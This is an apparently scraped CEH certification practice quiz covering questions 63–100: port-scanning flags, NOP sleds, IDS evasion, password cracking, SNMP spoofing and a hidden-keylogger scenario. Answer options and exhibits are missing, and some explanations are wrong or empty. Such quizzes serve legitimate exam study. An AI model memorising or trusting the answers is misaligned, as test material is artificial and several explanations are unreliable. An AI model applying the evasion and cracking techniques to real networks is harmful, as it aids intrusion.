63. Leesa is the senior security analyst for a publicly traded company. The IT department recently rolled out an intranet for company use only with information ranging from training, to holiday schedules, to human resources data. Leesa wants to make sure the site is not accessible from outside and she also wants to ensure the site is Sarbanes-Oxley (SOX) compliant. Leesa goes to a public library as she wants to do some Google searching to verify whether the company's intranet is accessible from outside and has been indexed by Google. Leesa wants to search for a website title of "intranet" with part of the URL containing the word "intranet" and the words "human resources" somewhere in the webpage.   What Google search will accomplish this?

Explanation

The correct answer, "intitle:intranet inurl:intranet+intext:"human resources"", will accomplish the desired Google search. This search uses the "intitle" operator to search for webpages with "intranet" in the title, the "inurl" operator to search for webpages with "intranet" in the URL, and the "intext" operator to search for webpages with "human resources" in the page content. This combination of operators will help Leesa find webpages that contain the desired keywords and meet her requirements for the company's intranet.

Submit
64. Which port, when configured on a switch receives a copy of every packet that passes through it?

Explanation

A SPAN (Switch Port Analyzer) port is configured on a switch to receive a copy of every packet that passes through it. This allows network administrators to monitor network traffic for troubleshooting, security analysis, or performance monitoring purposes. By configuring a SPAN port, network administrators can capture and analyze network traffic without interrupting the normal flow of data on the network.

Submit
65. You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c   What is the hexadecimal value of NOP instruction?  

Explanation

The hexadecimal value of the NOP (No Operation) instruction is 0x90. This instruction is used to perform no operation and is commonly used in buffer overflow exploits to create a NOP sled. A NOP sled is a series of NOP instructions that are used to slide the execution flow to the actual exploit code.

Submit
66. Attackers send an ACK probe packet with random sequence number, no response means port is filtered (Stateful firewall is present) and RST response means the port is not filtered. What type of Port Scanning is this?

Explanation

This type of port scanning is called ACK flag scanning. In this method, the attacker sends an ACK probe packet with a random sequence number. If there is no response, it indicates that the port is filtered, which means a stateful firewall is present. If a RST (reset) response is received, it means the port is not filtered.

Submit
67. Fred is the network administrator for his company. Fred is testing an internal switch. From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this?

Explanation

By sending an IP packet with the ACK bit and the source address of his machine, Fred can trick the switch into thinking that a session has already been established with his computer. This is because the ACK bit is used to acknowledge the receipt of data, and by setting it in the IP packet, Fred can make the switch believe that a previous communication has taken place. Additionally, by using his own machine's source address, Fred can make it appear as if the packet is coming from his computer, further enhancing the deception.

Submit
68. One of the most common and the best way of cracking RSA encryption is to begin to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _____________ process, then the private key can be derived.

Explanation

Factorization is the process of finding the prime factors of a number. In the context of RSA encryption, if an attacker is able to factorize the modulus (which is the product of the two prime numbers p and q), they can easily calculate the private key. This is because the private key is derived from the prime factors of the modulus. Therefore, factorization is the most common and effective way to crack RSA encryption.

Submit
69. Which of the following encryption is NOT based on block cipher?

Explanation

RC4 is not based on block cipher. It is a stream cipher algorithm that encrypts data by generating a stream of pseudorandom keys to XOR with the plaintext. Unlike block ciphers, which encrypt data in fixed-size blocks, RC4 operates on a continuous stream of data. DES, Blowfish, and AES (Rijndael) are all examples of block ciphers, where data is divided into fixed-size blocks and encrypted individually.

Submit
70. In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG, ECE, CWR. These flags have decimal numbers assigned to them:   FIN = 1 SYN = 2 RST = 4 PSH = 8 ACK = 16 URG = 32 ECE = 64 CWR =128   Example: To calculate SYN/ACK flag decimal value, add 2 (which is the decimal value of the SYN flag) to 16 (which is the decimal value of the ACK flag), so the result would be 18. Based on the above calculation, what is the decimal value for XMAS scan?

Explanation

The XMAS scan is a type of port scanning technique where the attacker sends packets with the FIN, URG, and PSH flags set to 1 and all other flags set to 0. To calculate the decimal value for the XMAS scan, we need to add the decimal values of the flags that are set to 1. In this case, the decimal values for FIN, URG, and PSH are 1, 32, and 8 respectively. Adding these values together gives us a total of 41, which is the decimal value for the XMAS scan.

Submit
71. Which type of sniffing technique is generally referred as MiTM attack?

Explanation

ARP poisoning is generally referred to as a Man-in-the-Middle (MiTM) attack. In this technique, an attacker sends fake Address Resolution Protocol (ARP) messages to associate their MAC address with the IP address of another device on the network. This allows the attacker to intercept and manipulate network traffic between the two devices, giving them the ability to eavesdrop on communications and potentially steal sensitive information.

Submit
72. Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result?

Explanation

When the ARP cache of the switches is successfully flooded, they will drop into hub mode. In hub mode, the switches will forward all incoming traffic to all connected devices, instead of selectively forwarding it based on the destination MAC address. This makes the network more susceptible to attacks as it allows an attacker to intercept and view all network traffic.

Submit
73. What is the default Password Hash Algorithm used by NTLMv2?

Explanation

The default Password Hash Algorithm used by NTLMv2 is MD5.

Submit
74. A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate?

Explanation

The alteration of the canary word indicates that a buffer overflow attack has been attempted. The canary word is used as a safeguard to detect if the buffer has been overflowed. If the canary word is altered, it means that the attacker has tried to overwrite the buffer beyond its allocated space, which is a common technique used in buffer overflow attacks.

Submit
75. Frederickson Security Consultants is currently conducting a security audit on the networks of Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises conducts business daily with the federal government, they must abide by very stringent security policies. Frederickson is testing all of Hawthorn's physical and logical security measures including biometrics, passwords, and permissions. The federal government requires that all users must utilize random, non-dictionary passwords that must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use a random password generator for their network passwords. The Frederickson consultants have saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and crack the network passwords. What method of attack is best suited to crack these passwords in the shortest amount of time?

Explanation

The best method of attack to crack these passwords in the shortest amount of time is a brute force attack. This is because the passwords used by Hawthorn employees are random and non-dictionary, which means that a dictionary attack (which tries common words and phrases) would not be effective. A brute force attack systematically tries every possible combination of characters until the correct password is found. Given that the passwords must take at least 30 days to crack, it suggests that they are complex and not easily guessable, making a brute force attack the most suitable option.

Submit
76. Which of the following is NOT part of CEH Scanning Methodology?

Explanation

Social Engineering attacks are not part of CEH Scanning Methodology. CEH Scanning Methodology involves checking for live systems, checking for open ports, banner grabbing, preparing proxies, scanning for vulnerabilities, and drawing network diagrams. Social Engineering attacks, on the other hand, involve manipulating individuals to gain unauthorized access to systems or information, which is not directly related to scanning networks for vulnerabilities.

Submit
77. This TCP flag instructs the sending system to transmit all buffered data immediately.

Explanation

The correct answer is PSH. The PSH (Push) flag in TCP instructs the sending system to transmit all buffered data immediately. This means that the data should not be delayed or held in the buffer, but should be sent to the receiving system as soon as possible. This flag is commonly used when there is a need for real-time or time-sensitive data transmission, ensuring that the data is delivered promptly.

Submit
78. You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed?

Explanation

not-available-via-ai

Submit
79. To see how some of the hosts on your network react, Winston sends out SYN packets to an IP range. A number of IPs respond with a SYN/ACK response. Before the connection is established he sends RST packets to those hosts to stop the session. Winston has done this to see how his intrusion detection system will log the traffic. What type of scan is Winston attempting here?

Explanation

Winston is sending SYN packets to an IP range to initiate a connection with the hosts on the network. If the hosts respond with SYN/ACK packets, it means they are live and listening. However, instead of completing the connection, Winston sends RST packets to stop the session. This technique is known as a half-open scan, as it does not fully establish a connection but still identifies live hosts on the network.

Submit
80. TCP packets transmitted in either direction after the initial three-way handshake will have which of the following bit set?

Explanation

After the initial three-way handshake in TCP, the ACK flag is set in the packets transmitted in either direction. The ACK flag is used to acknowledge the receipt of data and to confirm that the previous segment was received successfully. It is important for ensuring reliable data transmission and flow control in TCP.

Submit
81. Joseph has just been hired on to a contractor company of the Department of Defense as their Senior Security Analyst. Joseph has been instructed on the company's strict security policies that have been implemented, and the policies that have yet to be put in place. Per the Department of Defense, all DoD users and the users of their contractors must use two-factor authentication to access their networks. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph's company has already researched using smart cards and all the resources needed to implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication?

Explanation

Joseph should use a security token for two-factor authentication. A security token is a hardware device that generates a unique code or password that is used in addition to a pin number for authentication. It provides an extra layer of security by requiring the physical possession of the token in addition to knowledge of the pin number. This method is cost-effective compared to smart cards, as it does not require the same level of resources for implementation.

Submit
82. File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers?

Explanation

To disable file extensions in Apache servers, you would use mod_negotiation. This module allows you to control the content negotiation process, which includes handling file extensions. By disabling file extensions, you can prevent attackers from gathering information about the server technology and reduce the risk of vulnerability searches and attacks.

Submit
83. Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not illicit a response. What can he infer from this kind of response?

Explanation

Blane can infer that these ports are open because they do not elicit a response. This is because in an XMAS scan, when a port is open, it will not send any response back to the scanning device. This technique is often used by network administrators to hide open ports and make them less detectable. Therefore, the lack of response indicates that the ports are open and in stealth mode.

Submit
84. Jess the hacker runs L0phtCrack's built-in sniffer utility that grabs SMB password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashes from the network. Why?

Explanation

When SMB signing is enabled, it adds a digital signature to the SMB packets, ensuring the integrity and authenticity of the data being transmitted. This prevents unauthorized access or tampering with the data, including password hashes. Therefore, Jess is not able to pick up the hashes from the network because they are protected by SMB signing.

Submit
85. In Trojan terminology, what is a covert channel?

Explanation

A covert channel refers to a method of transferring information within a computer system or network in a way that goes against the established security policy. This means that the information is being transmitted in a manner that is not authorized or intended, potentially bypassing security measures and protocols.

Submit
86. Bob is going to perform an active session hijack against Brownies Inc. He has found a target that allows session oriented connections (Telnet) and performs the sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next?

Explanation

After finding an active session, Bob needs to guess the sequence numbers in order to perform the active session hijack. Sequence numbers are used to keep track of the order of packets in a network connection. By guessing the sequence numbers, Bob can disrupt the communication between the two parties and take control of the session.

Submit
87. You establish a new Web browser connection to Google. Since a 3-way handshake is required for any TCP connection, the following actions will take place. - DNS query is sent to the DNS server to resolve www.google.com - DNS server replies with the IP address for Google? - SYN packet is sentto Google. - Google sends back a SYN/ACK packet - Your computer completes the handshake by sending an ACK - The connection is established and the transfer of data commences   Which of the following packets represent completion of the 3-way handshake?  

Explanation

The 5th packet represents the completion of the 3-way handshake. This is because the 3rd packet is the SYN packet sent by the client, the 4th packet is the SYN/ACK packet sent by the server, and the 5th packet is the ACK packet sent by the client to acknowledge the SYN/ACK packet. The ACK packet completes the handshake and establishes the connection.

Submit
88. E-mail tracking is a method to monitor and spy the delivered e-mails to the intended recipient. Select a feature, which you will NOT be able to accomplish with this probe?

Explanation

E-mail tracking allows monitoring and spying on delivered e-mails, but it does not provide the capability to remotely control the user's e-mail client application and hijack the traffic. This feature goes beyond the scope of e-mail tracking and involves unauthorized access and control of the recipient's device.

Submit
89. What type of Virus is shown here?

Explanation

A cavity virus is a type of virus that infects executable files by inserting its code into empty spaces within the file. This allows the virus to hide and avoid detection. In this case, the given answer suggests that the virus shown is a cavity virus, indicating that it infects files by occupying empty spaces within them.

Submit
90. A Trojan horse is a destructive program that masquerades as a benign application. The software initially appears to perform a desirable function for the user prior to installation and/or execution, but in addition to the expected function steals information or harms the system. The challenge for an attacker is to send a convincing file attachment to the victim, which gets easily executed on the victim machine without raising any suspicion. Today's end users are quite knowledgeable about malwares and viruses. Instead of sending games and fun executables, Hackers today are quite successful in spreading the Trojans using Rogue security software.  What is Rogue security software?

Explanation

not-available-via-ai

Submit
91. Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?

Explanation

Using a weak key management technique is a form of programming error because it can compromise the security of the encryption. Even if encryption is implemented correctly, if the keys used for encryption are weak or easily guessable, it can be exploited by attackers. Weak key management techniques include using short or common passwords, not regularly changing encryption keys, or storing keys insecurely. These practices can undermine the effectiveness of encryption and leave the data vulnerable to unauthorized access. Therefore, Bob can explain to the management that encryption alone cannot address all security concerns if weak key management techniques are used.

Submit
92. What is the IV key size used in WPA2?

Explanation

The IV (Initialization Vector) key size used in WPA2 is 48 bits. The IV is a random value used to initialize the encryption algorithm and prevent repetition of encryption keys. A larger IV size provides better security by reducing the chances of an attacker guessing the IV and compromising the encryption.

Submit
93. Michael is a junior security analyst working for the National Security Agency (NSA) working primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use to decipher encrypted messages including Government Access to Keys (GAK) and inside informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use custom-built algorithms or obscure algorithms purchased from corrupt governments. For this reason, Michael and other security analysts like him have been forced to find different methods of deciphering terrorist messages. One method that Michael thought of using was to hide malicious code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into a hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice a day with a built in SMTP server. What technique has Michael used to disguise this keylogging software?

Explanation

Michael has used Alternate Data Streams (ADS) to disguise the keylogging software. ADS is a feature of the NTFS file system that allows additional data to be attached to a file without changing its size or appearance. In this case, Michael hides the keylogger inside the mapping program file readme.txt by attaching it as an alternate data stream. This allows the keylogger to remain hidden and undetected by the terrorist, as it appears as a harmless mapping program file.

Submit
94. Fred is scanning his network to ensure it is as secure as possible. Fred sends a TCP probe packet to a host with a FIN flag and he receives a RST/ACK response. What does this mean?

Explanation

The RST/ACK response indicates that the port Fred is scanning on the host is closed. When Fred sends a TCP probe packet with a FIN flag, he expects to receive a response indicating whether the port is open or closed. In this case, the RST/ACK response indicates that the port is closed and not accepting any incoming connections. This suggests that the network is secure because the closed port is not vulnerable to unauthorized access or attacks.

Submit
95. What techniques would you use to evade IDS during a Port Scan? (Select 4 answers)

Explanation

To evade IDS during a Port Scan, one can use the following techniques:
- Using fragmented IP packets: By splitting the packets, it becomes difficult for the IDS to detect the malicious activity.
- Spoofing IP address and sniffing responses: By disguising the source IP address, it becomes challenging for the IDS to track the attacker. Sniffing responses allows the attacker to gather information without being detected.
- Overloading IDS with junk traffic: By flooding the IDS with irrelevant traffic, the actual scan can be masked.
- Using source routing: If available, source routing can be used to bypass the IDS and hide the true source of the attack.
- Connecting to proxy servers or compromised machines: By using these intermediaries, the attacker can launch the scan without being directly traced.

Submit
96. John runs a Web server, IDS and firewall on his network. Recently his Web server has been under constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but the Web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. John becomes suspicious and views the Firewall logs and he notices huge SSL connections constantly hitting his Web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server and that was the reason the IDS did not detect the intrusions. How would John protect his network from these types of attacks?

Explanation

John can protect his network from these types of attacks by installing a proxy server and terminating SSL at the proxy. By doing this, the proxy server will handle the SSL connections and decrypt the HTTPS traffic before forwarding it to the Web server. This allows the IDS to inspect the decrypted traffic and detect any intrusion attempts. Additionally, John can also install a hardware SSL "accelerator" and terminate SSL at this layer. This will offload the SSL processing from the Web server, improving its performance and allowing the IDS to effectively monitor the decrypted traffic.

Submit
97. Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet: How can you protect/fix the problem of your application as shown above?

Explanation

The correct answer suggests that the programmer should stop inserting characters into the buffer when the counter is less than 200. This means that the programmer should add a condition to check if the counter is less than 200 before inserting any more characters. Additionally, the answer also suggests adding a separate statement to indicate that if 200 characters have already been written to the buffer, the stack should stop because it cannot hold any more data. This ensures that the buffer does not overflow and prevents any potential issues caused by exceeding its capacity.

Submit
98. Take a look at the following attack on a Web Server using obstructed URL: How would you protect from these attacks?

Explanation

Creating rules in an Intrusion Detection System (IDS) to alert on strange Unicode requests can help protect against attacks on a web server using obstructed URLs. By monitoring and analyzing the requests made to the server, the IDS can detect any unusual or suspicious Unicode requests and raise an alert. This allows the system administrators to investigate and take appropriate action to prevent any potential attacks or exploits.

Submit
99. An Attacker creates a zuckerjournals.com website by copying and mirroring HACKERJOURNALS.COM site to spread the news that Hollywood actor Jason Jenkins died in a car accident. The attacker then submits his fake site for indexing in major search engines. When users search for "Jason Jenkins", attacker's fake site shows up and dupes victims by the fake news. This is another great example that some people do not know what URL's are. Real website: Fake website: https://www.zuckerjournals.com The website is clearly not WWW.HACKERJOURNALS.COM. It is obvious for many, but unfortunately some people still do not know what an URL is. It's the address that you enter into the address bar at the top your browser and this is clearly not legit site, its www.zuckerjournals.com   How would you verify if a website is authentic or not?

Explanation

not-available-via-ai

Submit
100. The network administrator at Spears Technology, Inc has configured the default gateway Cisco router's access-list as below:   You are hired to conduct security testing on their network. You successfully brute-force the SNMP community string using a SNMP crack tool. The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed?

Explanation

The correct answer is to run a network sniffer and capture the returned traffic with the configuration file from the router, and to send a customized SNMP set request with a spoofed source IP address in the range - 192.168.1.0. By running a network sniffer, the attacker can capture the traffic between the router and other devices on the network, including the configuration file. This allows the attacker to retrieve the Cisco configuration from the router. Additionally, by sending a customized SNMP set request with a spoofed source IP address, the attacker can trick the router into sending the configuration file to their desired IP address.

Submit
View My Results

Quiz Review Timeline (Updated): Mar 22, 2023 +

Our quizzes are rigorously reviewed, monitored and continuously updated by our expert board to maintain accuracy, relevance, and timeliness.

  • Current Version
  • Mar 22, 2023
    Quiz Edited by
    ProProfs Editorial Team
  • Oct 27, 2013
    Quiz Created by
    Porterwb
Cancel
  • All
    All (100)
  • Unanswered
    Unanswered ()
  • Answered
    Answered ()
Within the context of Computer Security, which of the following...
How does a denial-of-service attack work?
John the hacker is sniffing the network to inject ARP packets. He...
This method is used to determine the Operating system and version...
William has received a Chess game from someone in his computer...
You are footprinting an organization and gathering competitive...
While testing web applications, you attempt to insert the following...
What framework architecture is shown in this exhibit?
Yancey is a network security administrator for a large electric...
What is the correct order of steps in CEH System Hacking Cycle?
You are the CIO for Avantes Finance International, a global finance...
What type of attack is shown here?
In which step does Steganography fits in CEH System Hacking Cycle...
What type of session hijacking attack is shown in the exhibit?
You have successfully gained access to a victim's computer using...
In which location, SAM hash passwords are stored in Windows 7?
What port number is used by LDAP protocol?
In this type of Man-in-the-Middle attack, packets and authentication...
Which of the following steganography utilities exploits the nature of...
You work for Acme Corporation as Sales Manager. The company has tight...
John is using a special tool on his Linux platform that has a database...
Identify SQL injection attack from the HTTP requests shown below:
Study the snort rule given below and interpret the rule. ...
This is an attack that takes advantage of a web site vulnerability in...
You are gathering competitive intelligence on an organization. You...
Johnny is a member of the hacking group Orpheus1. He is currently...
The programmers on your team are analyzing the free, open source...
_____________ is a type of symmetric-key encryption algorithm that...
Neil is closely monitoring his firewall rules and logs on a regular...
The FIN flag is set and sent from host A to host B when host A has no...
Jason is the network administrator of Spears Technology. He has...
Charlie is the network administrator for his company. Charlie just...
"Testing the network using the same methodologies and tools...
You receive an e-mail like the one shown below. When you click on the...
Every company needs a formal written document which spells out to...
When a normal TCP connection starts, a destination host receives a SYN...
A digital signature is simply a message that is encrypted with the...
Which definition below best describes a covert channel?
You went to great lengths to install all the necessary technologies to...
In this attack, a victim receives an e-mail claiming from PayPal...
How do you defend against MAC attacks on a switch?
What is the command used to create a binary log file using tcpdump?
Gerald, the Systems Administrator for Hyped Enterprises, has just...
Bob was frustrated with his competitor, Brownies Inc., and decided to...
Finding tools to run dictionary and brute forcing attacks against FTP...
Data is sent over the network as clear text (unencrypted) when Basic...
ViruXine.W32 virus hides their presence by changing the underlying...
What type of encryption does WPA2 use?
Bob has been hired to do a web application security test. Bob notices...
Your company has blocked all the ports via external firewall and only...
This is an example of whois record. ...
When writing shellcodes, you must avoid ____________ because these...
You have chosen a 22 character word from the dictionary as your...
NetBIOS over TCP/IP allows files and/or printers to be shared over the...
Which of the following Trojans would be considered 'Botnet Command...
You want to know whether a packet filter is in front of 192.168.1.10....
Lee is using Wireshark to log traffic on his network. He notices a...
Harold works for Jacobson Unlimited in the IT department as the...
LAN Manager Passwords are concatenated to 14 bytes, and split in half....
One of the ways to map a targeted network for live hosts is by sending...
Hampton is the senior security analyst for the city of Columbus in...
Switches maintain a CAM Table that maps individual MAC addresses on...
Leesa is the senior security analyst for a publicly traded company....
Which port, when configured on a switch receives a copy of every...
You are programming a buffer overflow exploit and you want to create a...
Attackers send an ACK probe packet with random sequence number, no...
Fred is the network administrator for his company. Fred is testing an...
One of the most common and the best way of cracking RSA encryption is...
Which of the following encryption is NOT based on block cipher?
In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG,...
Which type of sniffing technique is generally referred as MiTM attack?
Nathan is testing some of his network devices. Nathan is using Macof...
What is the default Password Hash Algorithm used by NTLMv2?
A simple compiler technique used by programmers is to add a terminator...
Frederickson Security Consultants is currently conducting a security...
Which of the following is NOT part of CEH Scanning Methodology?
This TCP flag instructs the sending system to transmit all buffered...
You are trying to break into a highly classified top-secret mainframe...
To see how some of the hosts on your network react, Winston sends out...
TCP packets transmitted in either direction after the initial...
Joseph has just been hired on to a contractor company of the...
File extensions provide information regarding the underlying server...
Blane is a network security analyst for his company. From an outside...
Jess the hacker runs L0phtCrack's built-in sniffer utility that...
In Trojan terminology, what is a covert channel?
Bob is going to perform an active session hijack against Brownies Inc....
You establish a new Web browser connection to Google. Since a 3-way...
E-mail tracking is a method to monitor and spy the delivered e-mails...
What type of Virus is shown here?
A Trojan horse is a destructive program that masquerades as a benign...
Bob has a good understanding of cryptography, having worked with it...
What is the IV key size used in WPA2?
Michael is a junior security analyst working for the National Security...
Fred is scanning his network to ensure it is as secure as possible....
What techniques would you use to evade IDS during a Port Scan? (Select...
John runs a Web server, IDS and firewall on his network. Recently his...
Buffer X in an Accounting application module for Brownies Inc. can...
Take a look at the following attack on a Web Server using obstructed...
An Attacker creates a zuckerjournals.com website by copying and...
The network administrator at Spears Technology, Inc has configured the...
Alert!

Advertisement